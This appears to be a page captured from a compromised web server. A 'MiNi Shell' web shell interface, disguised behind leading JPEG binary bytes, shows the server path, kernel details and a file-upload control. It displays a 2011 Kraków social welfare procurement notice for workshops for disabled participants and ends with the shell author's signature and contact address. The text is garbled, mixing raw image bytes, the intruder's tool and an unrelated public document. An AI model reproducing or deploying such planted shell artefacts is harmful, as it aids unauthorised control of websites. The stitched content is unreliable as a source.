JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111105/289285-N-2011.html

<p class="kh_header"><b>Kraków: Zorganizowanie i preprowadzenie warsztatów aktywizacji zawodowej dla niepełnosprawnych uczestników projektu pora na akywność</b><br>
<b>Numer ogłoszenia: 289285 - 2011; data zamieszczenia: 05.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie , ul. Józefińska 14/002, 30-529 Kraków, woj. małopolskie, tel. 012 6165420, 6165424, faks 012 6165428.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i preprowadzenie warsztatów aktywizacji zawodowej dla niepełnosprawnych uczestników projektu pora na akywność.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie  warsztatów aktywizacji zawodowej dla niepełnosprawnych uczestników  projektu  Pora na aktywność., zgodnie z poniższymi wytycznymi:
1.	Usługa obejmuje:
1)	Grupa I - warsztaty dla osób niepełnosprawnych wraz z otoczeniem,
2)	Grupa II - warsztaty dla osób chorujących psychicznie i osób niepełnosprawnych wraz z ich otoczeniem,
Uwaga: 
1)	za otoczenie uznaje się osoby wspólnie zamieszkujące lub wspierające osobę niepełnosprawną w funkcjonowaniu w miejscu zamieszkania,
2)	uczestnikami warsztatów będą wyłącznie osoby dorosłe - w tym w I grupie 10 osób poruszających się na wózkach inwalidzkich 
3)	Program zajęć stanowi załącznik nr 1 do formularza ofertowego

2.	Forma organizacyjna dla każdej grupy:
1)	warsztaty niestacjonarne - trwające kolejnych 7 dni,
2)	warsztaty stacjonarne - po dwa spotkania w miesiącu (jedno spotkanie na 2 tygodnie - trwające 2 godziny zegarowe zajęć z przerwami dostosowanymi do potrzeb uczestników).
3.	Ilość uczestników:
1)	Zajęcia niestacjonarne
a)	Grupa I - maksymalnie 120 w tym:
-	60 beneficjentów,
-	60 osób z otoczenia beneficjenta,
a)	Grupa II - maksymalnie 90 w tym:
-	50 beneficjentów,
-	40 osób z otoczenia beneficjenta,
2)	Zajęcia stacjonarne 
a)	grupa I - maksymalnie 120 osób, w tym:
-		60 beneficjentów,
-  	60 osób z otoczenia beneficjenta,
b)   grupa II - maksymalnie 50 beneficjentów
W warsztatach niestacjonarnych będą uczestniczyć 2 osoby ze strony Zamawiącego przebywające na warsztatach łącznie przez cały czas ich trwania, 
Uwaga
Informację na temat ostatecznej liczby uczestników Zamawiający przekaże na minimum 7 dni przed datą wyjazdu lub w momencie podpisania umowy, przy czym liczba uczestników nie przekroczy ilości wskazanej w specyfikacji.

4.	Sposób organizacji zajęć niestacjonarnych
1)	zajęcia dla grupy I i II będą realizowane oddzielnie, i mogą być przeprowadzone w różnych terminach
2)	warsztaty dla beneficjentów będą prowadzone w tym samym czasie co warsztaty dla osób z ich otoczenia,
3)	zajęcia dla każdej z grup będą się odbywać w podgrupach:
a)	warsztaty dla beneficjentów - liczących nie więcej niż 12 osób,
b)	warsztaty dla osób z otoczenia - liczących nie mniej niż 10 osób i nie więcej niż 15 osób.

5.	Sposób organizacji zajęć stacjonarnych
1)	zajęcia dla grupy I i II będą realizowane oddzielnie, i mogą być przeprowadzone w różnych terminach 
2)	w grupie I zajęcia będą się odbywać w 6 podgrupach po 20 osób (10 beneficjentów i 10 osób z otoczenia),
3)	w grupie II - zajęcia w grupach samokształceniowych - prowadzone w 5 podgrupach liczących po 10 osób,
4)	zajęcia dla każdej z podgrup mogą się odbywać w innym terminie.

6.	Liczba godzin warsztatów dla każdego beneficjenta
1)	zajęcia niestacjonarne - 48 godzin dydaktycznych warsztatów,
2)	zajęcia stacjonarne - 32 godziny dydaktyczne.

7.	Metodyka pracy:
1)	przewaga form aktywnych co najmniej 70% ( ćwiczenia, wchodzenie w role, drama), 
2)	uczestnik wykonuje osobiście zadanie, w oparciu o które zdobywa wiedzę o danym zjawisku, a następnie uzyskuje profesjonalny komentarz  merytoryczny odnośnie ćwiczonego tematu pogłębiający jego wiedzę i zrozumienie zjawiska.

8.	Wykonawca zapewni
1)	odpowiednie warunki lokalowe do przeprowadzenia warsztatów i zalecane materiały szkoleniowe,
2)	możliwość organizacji czasu wolnego (np. dostęp do sali gimnastycznej, basenu itp.),
3)	pokrycie kosztów  opłat parkingowych,
4)	opłatę klimatyczną,
5)	ubezpieczenie NNW oraz kosztów leczenia na kwotę min.10000zł/os,
6)	dojazd uczestnikom warsztatów z siedziby Zamawiającego do miejsca   szkolenia i z powrotem własnymi lub udostępnionymi przez firmę  przewozową autokarami, zgodnie z obowiązującymi przepisami dot. przewozu osób niepełnosprawnych - w tym dla osób poruszających się na wózkach inwalidzkich. Autokary mają  posiadać klimatyzację lub możliwość otwierania okien   Obowiązkiem przewoźnika jest posiadanie wymaganych przepisami dokumentów  m.in. licencji przewoźnika oraz podstawienie autokaru  sprawnego technicznie, posiadającego pełną dokumentacje gwarantującą  przejazd na trasie  określonej w umowie zgodnie z przepisami obowiązującymi  w Polsce, oraz posiadanie wymaganego ubezpieczenia. Kierowca jest zobowiązany do   dbania o czystość   autokaru podczas podróży, 
7)	posiłki - zgodnie z menu stanowiącym załącznik nr 2 do formularza ofertowego, 
8)	właściwą jakość przygotowywanego posiłku z uwzględnieniem temperatury i          innych wymogów ustawy o warunkach zdrowotnych żywności i żywienia oraz             przepisów ustawy o Państwowej Inspekcji Sanitarnej,
9)	oznaczenia dokumentów wytworzonych w związku z realizacją zadania,             materiałów, pomieszczeń  w których odbywać się będą zajęcia itp., zgodnie z           wytycznymi oznaczania projektów POKL, zamieszczonymi na stronie            internetowej www.efs.gov.pl/ZPFE/Strony/Dokumenty.aspx,
10)	wydanie po zakończeniu realizacji usługi zaświadczeń oznakowanych zgodnie z              w/w   wytycznymi,
11)	materiały szkoleniowe dla każdego uczestnika warsztatów w tym:
a)	plan zajęć,
b)	długopis metalowy typu zenit,
c)	długopis różnokolorowy,
d)	blok biurowy 60 stron kratka A4,
e)	skrypt zajęć zawierający materiał omawiany na warsztatach, wskazówki, porady (materiały dydaktyczne i publikacje o łącznej objętości  minimalnie 50 stron, ilustrowane  dostosowane do  potrzeb uczestników zawierające informacje konieczne do zapamiętania, w tym co najmniej przykładowy list motywacyjny, CV, adresy portali internetowych związanych z poszukiwaniem pracy, ćwiczenia relaksacyjne),
12)	opiekę pielęgniarską lub opiekę lekarską polegającą na wezwaniu lekarza do ośrodka lub dowiezieniu uczestnika pobytu do przychodni/szpitala,
13)	dokumentację fotograficzną usługi i przekazania jej na zakończenie całej usługi do Zamawiającego.       

9.	Warunki dodatkowe:
1)	podczas realizacji usługi Wykonawca zobowiązany jest do: 
a)	prowadzenia dziennika każdych zajęć zawierający listę obecności, wymiar godzin , 
b)	potwierdzenia przez beneficjentów odbioru materiałów szkoleniowych , wyżywienia oraz skryptu.
2)	Wykonawca przedstawi szczegółowy program zajęć, oraz skrypt do akceptacji Zamawiającego  w terminie do 3 dni po podpisaniu umowy,
3)	Wykonawca  zachowa w tajemnicy wszelkie dane osobowe, do których uzyskał dostęp  w  związku z wykonywaniem zadania oraz przestrzegania innych postanowień ustawy   o  ochronie danych osobowych,
4)	Wykonawca zobowiązany jest dostarczyć polisę ubezpieczeniową potwierdzającą warunek ubezpieczenia uczestników najpóźniej  na 2 dni przed terminem     wyjazdu,
5)	koszt pobytu pracowników Zamawiającego Wykonawca jest zobowiązany uwzględnić          w cenie oferty,
6)	Wykonawca może zostać skontrolowany w zakresie przedmiotu zamówienia przez         Zamawiającego lub podmiot kontrolujący Zamawiającego,
7)	w pomieszczeniach, w których będą odbywać się zajęcia będzie panować temperatura         pokojowa,
8)	pokoje, w których będą zakwaterowani beneficjenci będą dla nich dostępne do momentu wyjazdu z ośrodka,
9)	Wykonawca zorganizuje w terminie 5 dni roboczych od daty zakończenia usługi w       
      zasobach lokalowych Zamawiającego spotkanie podsumowujące, podczas którego 
      przekaże Zamawiającemu zgromadzoną dokumentację tj: listy obecności, potwierdzenia 
      odbioru   materiałów piśmienniczych, skryptu, dokumentacji fotograficznej z przebiegu      
      realizacji    usługi, przedstawi ocenę skuteczności podjętych działań w odniesieniu do 
     założonych celów.

III.	Miejsce realizacji

1.  zajęcia stacjonarne:

Wymogi dotyczące realizacji miejsca zamówienia:
1)	sale do prowadzenia zajęć bez barier architektonicznych, dostosowane dla osób na wózkach inwalidzkich , w odległości nie większej niż 0,5 km od przystanku komunikacji miejskiej. W przypadku budynku znajdującego się w większej odległości od przystanku Wykonawca jest zobowiązany zorganizować transport dla osoby niepełnosprawnej,
2)	sale do zajęć grupowych na minimum 20 osób / sale do zajęć - stanowiące oddzielne pomieszczenie, układ sali umożliwiający przeprowadzenie warsztatów tj. ułożenie krzeseł w półkole/okrąg, przestrzeń na ćwiczenia ruchowe./ w ilości wystarczającej do przeprowadzenia warsztatów,
3)	wyposażenie przynajmniej jednej sali w sprzęt audio - video, DVD (telewizor, video, z możliwością podłączenia laptopa, rzutnik multimedialny z ekranem,  flipczart z pisakami 4 x czarny, 2x niebieski, 2x zielony, 2x czerwony oraz papierem,), 1 ryza papieru białego A4 do drukarki, możliwość wydrukowania lub kserowania materiałów do zajęć.

2.	zajęcia niestacjonarne 

Wymogi dotyczące realizacji miejsca zamówienia:
pensjonat/ośrodek wypoczynkowy, ośrodek szkoleniowy bez barier architektonicznych, dostosowany dla osób na wózkach inwalidzkich, w odległości do 150 km od Krakowa ( poza terenem gminy miejskiej Kraków), w miejscowości charakterze turystyczno-wypoczynkowym,  dysponujący:
1)	pokojem do zajęć indywidualnych, wyposażonym w krzesła i stół
2)	stołówką w budynku zakwaterowania;
3)	pokojami 1, 2, 3, 4 osobowymi, z łazienkami, w tym 1 pokój dwuosobowy dla przedstawicieli zamawiającego. Pokoje muszą być wyposażone w łóżka jednoosobowe wraz z kompletem  pościeli, do każdego łóżka przynależna szafka lub minimum 1 półka w szafie na uczestnika.
4)	9 salami do zajęć grupowych, każda na min. 12 osób / sale do zajęć - stanowiące oddzielne pomieszczenie, układ sali umożliwiający przeprowadzenie warsztatów tj. ułożenie krzeseł w półkole/okrąg, przestrzeń na ćwiczenia ruchowe.
5)	wyposażeniem przynajmniej 2 sal w sprzęt audio - video, DVD (telewizor, video, z możliwością podłączenia laptopa, rzutnik multimedialny z ekranem,  flipczart z pisakami 4 x czarny, 2x niebieski, 2x zielony, 2x czerwony oraz papierem,), 1 ryzę papieru białego A4 do drukarki, możliwość wydrukowania lub kserowania materiałów do zajęć.

IV.	Termin realizacji
1.	warsztaty niestacjonarne - od dnia podpisania umowy do 15 grudnia 2011r 
2.	warsztaty stacjonarne - od 01.01.2012 do 30.06.2012.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający może udzielić Wykonawcy zamówień uzupełniających w trybie zamówienia z wolnej ręki, w okresie 3 lat od udzielenia zamówienia podstawowego, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca lub jego podwykonawca  posiada wpis do Rejestru Organizatorów Turystyki i Pośredników Turystycznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)		psycholog 
a)	wykształcenie wyższe psychologiczne
b)	doświadczenie w prowadzeniu zajęć z osobami niepełnosprawnymi
2)	prawnik
a)	wykształcenie wyższe prawnicze
b)	doświadczenie zawodowe w zakresie rynku pracy dla osób niepełnosprawnych
3)	doradca zawodowy
a)	wykształcenie wyższe kierunkowe
b)	doświadczenie w pracy z osobami niepełnosprawnymi
4)	trener pracy, asystent rodzinny, asystent osoby niepełnosprawnej, instruktor czynności zawodowych lub terapeuta zajęciowy
a)	wykształcenie wyższe kierunkowe
b)	doświadczenie zawodowe w prowadzeniu zajęć warsztatowych dla niepełnosprawnych
5)	socjoterapeuta
a)	wykształcenie wyższe kierunkowe
b)	doświadczenie zawodowe 
6)	przedstawiciel pracodawcy zatrudniającego osobę niepełnosprawną w obszarze dozorcostwo i ochrona mienia, utrzymywanie porządku, gastronomia, instytucje kultury, hotelarstwo, pralnie  oraz w zakresie innych  prac pomocniczych
7)	osoba niepełnosprawna pracująca zawodowo

Przed podpisaniem umowy Wykonawca będzie zobowiązany przedstawić Zamawiającemu dokumenty potwierdzające spełnianie wymogów, o których mowa w rozdz. II. W przypadku nie wypełnienia w/w obowiązku, Zamawiający nie przystąpi do podpisania umowy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a)	warunków płatności,
b)	terminu realizacji usługi
c)	miejsca realizacji usługi
d)	podwykonawców</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MOPS Kraków ul.Józefińska 14 pok 002.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.11.2011 godzina 09:00, miejsce: Dziennik Podawczy Miejskiego Ośrodka Pomocy Społecznej w Krakowie ul.Józefińka 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> POKL Pora na aktywność.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com